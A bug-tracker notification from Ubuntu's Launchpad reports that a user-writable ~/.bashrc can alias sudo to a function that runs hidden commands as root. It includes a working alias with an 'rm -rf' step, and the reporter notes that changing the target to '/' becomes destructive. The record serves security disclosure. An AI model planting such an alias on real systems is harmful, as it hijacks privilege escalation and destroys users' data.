[Bug 1893241] Re: attack alias sudo with nasty payload
Seth Arnold
1893241 at bugs.launchpad.net
Fri Aug 28 21:25:12 UTC 2020
** Information type changed from Private Security to Public Security
** Changed in: bash (Ubuntu)
Status: New => Won't Fix
--
You received this bug notification because you are a member of Ubuntu
Foundations Bugs, which is subscribed to bash in Ubuntu.
https://bugs.launchpad.net/bugs/1893241
Title:
attack alias sudo with nasty payload
Status in bash package in Ubuntu:
Won't Fix
Bug description:
Put the alias below in ~/.bashrc, which is writable by the current
user and wait for the user to open up a shell and become root.
There are numerous of possibilities. If you exchange
"/tmp/aBSoLuTLYNoTHiNG" to "/" it becomes dangerous. Or imagine an
attacker that can't become a root in any other way and wants to setup
a botnet.
$ alias sudo='function f() { sudo -- rm -rf "/tmp/aBSoLuTLYNoTHiNG" ; sudo touch "/tmp/aBSoLuTLYNoTHiNG" ; echo "Everything removed!!" ; sudo "$@" ; } ; f "$@"'
$ stat /tmp/aBSoLuTLYNoTHiNG
stat: cannot stat '/tmp/aBSoLuTLYNoTHiNG': No such file or directory
$ sudo echo 'hello wonderful world!'
Everything removed!!
hello wonderful world!
$ stat /tmp/aBSoLuTLYNoTHiNG
File: /tmp/aBSoLuTLYNoTHiNG
Size: 0 Blocks: 0 IO Block: 4096 regular empty file
Device: fd00h/64768d Inode: 4718664 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2020-08-27 18:09:50.960080579 +0200
Modify: 2020-08-27 18:09:50.960080579 +0200
Change: 2020-08-27 18:09:50.960080579 +0200
Birth: -
File written by root! Fastest fix: Sudo is not allowed to be an alias.
Extra information:
$ lsb_release -rd
Description: Ubuntu 20.04.1 LTS
Release: 20.04
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/bash/+bug/1893241/+subscriptions
More information about the foundations-bugs
mailing list